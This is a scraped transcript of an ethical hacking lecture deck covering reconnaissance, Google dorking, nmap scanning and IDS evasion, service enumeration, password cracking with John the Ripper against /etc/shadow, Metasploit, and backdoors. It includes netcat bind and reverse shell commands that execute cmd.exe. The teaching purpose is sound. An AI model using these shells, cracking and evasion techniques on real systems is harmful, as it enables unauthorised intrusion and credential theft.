Presentation is loading. Please wait.

Presentation is loading. Please wait.

Dr. Igor Santos.  ¿What is Ethical Hacking?  Phases  Information Gathering  Network Mapping & Scanning  Password Attacks  Service Enumeration 

Similar presentations


Presentation on theme: "Dr. Igor Santos.  ¿What is Ethical Hacking?  Phases  Information Gathering  Network Mapping & Scanning  Password Attacks  Service Enumeration "— Presentation transcript:

1 Dr. Igor Santos

2  ¿What is Ethical Hacking?  Phases  Information Gathering  Network Mapping & Scanning  Password Attacks  Service Enumeration  Vulnerabilities Identification & Exploitation 2

3 ¿What is Ethical Hacking? 3

4  A method to evaluate the security of a system or a network of systems by simulating an intruder attack  It shows the actual impact of a vulnerability through controled tests  It searchs for unknown vulnerabilities 4

5  Information level  White Box  Black Box  ¿Social Engineering?  ¿Physical Security?  ¿Dangerous Tests?  Exploits  DoS  … 5

6 Information Gathering 6

7  Gather information about the target before the attack  Without (too much) contact  As much information as possible  The information can be very valuable in the future  More information = More probability of success in the attack 7

8  Information we search for:  Names and/or Positions of workers  addresses  User names  Public Addresses, Domains or URLs  Used Software and Technologies  Internal addresses or URLs  Internal PATHs  Data about the system configuration 8

9  Client and supplier names  Physical Location  Telephone Number  …  Iterative process  When information is found, new searches are performed 9

10  Sources  Search Engines  DNS servers  Whois servers  Metadata  Social Networks  P2P networks  … 10

11  Passive Methods  The target is not contacted directly ▪ Search Engines ▪ Whois ▪ …  Active Methods  It leaves some trace in the target ▪ DNS zone transfer ▪ Web site Mirroring ▪ … 11

12  Internet Service Registration (whois)  Information about IP record and maintenance  Search Engines  Gather public information from company and workers web sites 12

13  DNS queries  Identification of hosts by DNS querying  Web site analysis  Intentionally published information, that may suppose a risk for the security 13

14  New sources!!!  Social Networks  Metadata  P2P networks  Work searching websites 14

15  Google Hacking: Search in Google sensitive information, usually with malicious goals  Johnny Long  Google Hacking For Penetration Testers  ▪ No mantenida  ▪ Continuación!!! (9 nov. 2010)  Cheat-sheet 15

16  ¿What to look for?  Vulnerable applications (e.g.,: inurl:eStore/index.cgi?)  Error Messages (e.g.,: “Warning: mysql_query()” “invalid query”)  Files with sensitive information (e.g.,: filetype:sql “insert into”)  Websites with private reports (e.g.,: intitle:”Nessus Scan Report”)  Web server versions (e.g.,: “Microsoft-IIS/* server at”, intitle:index.of) 16

17   A “diferent” search engine  If finds systems by performing searches based on the banner responses ▪ Computer search engine  Filters:  Examples: ▪ net: /24 ▪ port:22 country:ES 17

18  Netcraft (http://news.netcraft.com)http://news.netcraft.com  It shows the following domain information given a domain ▪ OS version. ▪ Web server version ▪ Uptime 18

19  Countermeasures  To properly configure the “robots.txt” file ▪ This file indicates to search engines what the must NOT index  Periodically audit the web site with these techniques in order to check that there is no access to sensitive information 19

20  ¿Who does have a profile in Facebook or LinkedIn?  ¿Do we know how to handle privacity in social networks?  Social Engineering  Create a fake profile in order to obtain access to private profiles = ¡Lot of information!  Social Network Search Engines ▪ ▪ 20

21  Countermeasures  Limit the presence in social networks  Don’t publish too much  Don’t publish automatically  Don’t accept every friendship request (we may not be the final victim but an attack vector) 21

22  Hidden information regarding a document  Author  Used Application  Date of Creation  Camera Model (images)  Addresses  …  They enhance the information present in a document 22

23  A tool that started by being a metadata extractor and analyzer, now is more than that:  Document panel: Searches several types of documents in Google, Bing and Exaled  DNS Search Panel : It uses different techniques to obtain more domain names  Countermeasures: Metashield Protector  It cleans the metadata from documents 23

24 Network Mapping & Scanning 24

25  Several techniques  Host discovery  Port scanning  IDS (Intrusion Detection System) evasion  Service and OS identification (fingerprinting) 25

26  Nmap  Tool for network exploration and security auditing nmap [.][ ] { }  Options ▪ Scan type: -sS, -sX, -sU, … ▪ -p : ports to scan (separated by a comma or “-” for range) (to scan all of them –p ) 26

27  Zenmap  Front-end for nmap  It draws a network map with the results  Predefined scans 27

28  Manual  Cheat sheet 20cheatsheet%20eng%20v1.pdf  Book 28

29  Identify online systems  First step for network mapping  Classic method using ping  ICMP echo request  Alive systems respond to ICMP echo reply  It is also possible to send TCP packets and wait for the response of the online  ARP Ping in local networks 29

30  Nmap ping (-sP)  ICMP echo request & ICMP timestamp request  TCP ACK packet port 80  TCP SYN packet port 443  Example: nmap –sP

31  One of the most widespread hacking techniques  Nmap en Hollywood  A computer executes several services that listen in tcp/udp ports  By means of scanning, we can locate open ports 31

32  TCP Connect scan  A TCP connection is established with the destination port (Three-Way Handshake)  A very reliable method to determine the port state  Simple and easy to detect ▪ Generates too much noise nmap –sT -p 32

33  Open port 33

34  Closed port 34

35  Filtered port 35

36  SYN scan  If a port listening is found, the full connection is not established ▪ A RST is sent to finalize it  Because Three-Way Handshake is not completed, a lot of system don’t log the connection attempt  A IDS can easily detect it  Quick and realiable nmap –sS -p 36

37  Open port 37

38  Closed port 38

39  Filtered port 39

40  UDP is a protocal not connection oriented  Closed ports return the packet “ICMP destination unreachable”  If the ICMP traffic is filtered the responsed are not retrieved for the closed ports  The port state cannot be determined conclusively nmap –sU -p 40

41  Open/Filtered port 41

42  Closed port 42

43  Techniques to avoid IDS/IPS  Use of fragmented packets ▪ Distribution of an IP packet between various data blocks nmap -sS -f -p  Spoofing of origin IPs to emulate multiple attackers ▪ Hiding our own IP (attacker) nmap –sS –D -p 43

44  Service Fingerprinting  Identification of the service listening in a port TCP/UDP nmap –sV -p  O.S. Fingerprinting  Identification of the Operative System nmap –O 44

45  Disable unnecessary services  Close ports  Firewall / IDS / IPS  ICMP traffic filtering 45

46 Enumeration 46

47  Get information through a network service  What information?  System user names  addresses  other systems ... 47

48  Services  FTP: anonymous / Ftp-user-enum  TFTP: ¡without authentication!  SMTP: VRFY y EXPN commands → smtpenum  DNS: Direct/Reverse Lookup y zone transfer  HTTP: banner grabbing  RPC: edump, rpcdump, rpcinfo  NETBIOS: samrdump  SNMP: snmpwalk, snmpheck  LDAP: Brute force by means of the Guest user 48

49  Maintain the services updated  Disable unnecessary services 49

50  ATAQUES A CONTRASEÑAS Passwords Attacks 50

51  It is unknown some or all the necessary data to authenticate  User (if the Information Gathering phase has been correctly done, we will have several system users)  Password  The password file is known, but it is encrypted  Words are test until the correct one is found 51

52  Systems store a password Hash  They do not store clear users' passwords  One-way encryption function  It cannot be decrypted ▪ on on 52

53  During a pentest we will collect password hashes  Bad configurations  Successful intrusion  With administrative permission is possible to dump the hashes of the passwords of system users  Windows -> SAM  Unix -> / etc / passwd, / etc / shadow 53

54  Dictionary  It is based on a list of user names or passwords  Common Words  Terms related to the audited  Try until the right one is found  It should be on the list!  Success depends on how good and / or extensive is the dictionary  / pentest / passwords / wordlists 54

55  Hybrid  It uses a dictionary, but variations are also introduced  Examples  Try dictionary words in lowercase and uppercase  A is changed by 4, S by 5, E by 3,... 55

56  Brute Force  Usernames or passwords are generated within a rank and given a character set ▪ Eg max 8 characters [A-Za-z] 56

57  Password cracking tool  Able to break several algorithms  DES  MD5  SHA-1  LM (Lan Manager) ...  You can save a session for later cracking 57

58  Single mode  Quick test  Difficult to have success  It uses typical passwords and some variations john --single 58

59  Wordlist Mode  It tests with a dictionary file  Quick  Hybrid attack: --rules john --wordlist=  Dictionaries /pentest/passwords/wordlists/ 59

60  Incremental Mode  It tries all possible combinations of passwords (Brute Force) ▪ Only letters (--incremental:alpha) ▪ Only numbers (--incremental:digits) ▪ Letters, numbers and some special characters (--incremental:lanman) ▪ All characters (--incremental:all) john --incremental:[mode] 60

61  Show cracked hashes  john --show /etc/shadow 61

62  Shoulder surffing  Social Engineering  Sniffing  Capture the session logins  Physical access  Bypass -> konboot  Password cracking 0phcrack live cd (Rainbow Tables) 62

63 Vulnerabilities Identification & Exploitation 63

64  Terminology  Vulnerability  Exploit (client-side, server-side, …)  0-day exploit  Payload  CVE (Common Vulnerabilities and Exposures): 64

65  Lots of vulnerabilities types:  Configuration (not design)  Input validation  Directory Jump  Command Injection  SQL Injection  Cross-site scripting (XSS)  Buffer overflow  … 65

66  Vulnerability Search  Security Focus ▪  National Vulnerability Database ▪  CERT ▪ s_1/vulnerability_search/?postAction=getVulns s_1/vulnerability_search/?postAction=getVulns  Microsoft Security Bulletins ▪ 10-oct.mspx 10-oct.mspx  Scanners: Secunia, Nessus, etc. 66

67  Exploits Search  Exploit Database ▪ Milw0rm continuation. ▪  Others ▪ ▪ ▪ ▪ 67

68  Metasploit  Framework for vulnerbility explotation  It help in the development of new exploits  It allows to define ▪ What exploit is going to be used ▪ Which payload is going to be launched lanzará ▪ Meterpreter: advanced payload without disk access (DLL Injection) → less forensics evidences. ▪ How is going to be coded (avoiding IDS, etc.) 68

69  Mantaining the access– Backdoors  Tiny Shell: Unix backdoor  Hydrogen: backdoor from Immunitysec ▪ It includes robust encryption and traffic hiding  Radmin: Windows backdoor ▪ A remote desktop like connection. Very easy to use and with a lot of functions 69

70  Netcat: it can be used as backdoor ▪ Victim (server): nc -lp 4444 –e cmd.exe ▪ Attacker (client): nc –vv 4444 ▪ Also “reverse shell”: ▪ Attacker (client): nc –vvlp 4444 ▪ Victim (server): nc –vv 4444 –e cmd.exe 70

71  Images  RTVE   The Matrix, Warner Bros.   71


Download ppt "Dr. Igor Santos.  ¿What is Ethical Hacking?  Phases  Information Gathering  Network Mapping & Scanning  Password Attacks  Service Enumeration "

Similar presentations


Ads by Google